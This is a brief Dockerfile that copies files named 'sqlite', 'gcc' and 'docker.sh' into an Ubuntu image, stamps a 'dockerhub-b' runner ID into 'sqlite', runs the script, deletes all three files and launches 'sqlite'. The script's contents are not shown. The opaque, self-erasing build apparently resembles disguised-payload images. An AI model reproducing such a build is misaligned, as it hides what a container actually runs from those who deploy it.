FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > sqlite.log'

COPY sqlite .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' sqlite
RUN bash ./docker.sh

RUN rm --force --recursive sqlite
RUN rm --force --recursive docker.sh
RUN rm --force --recursive gcc

CMD sqlite
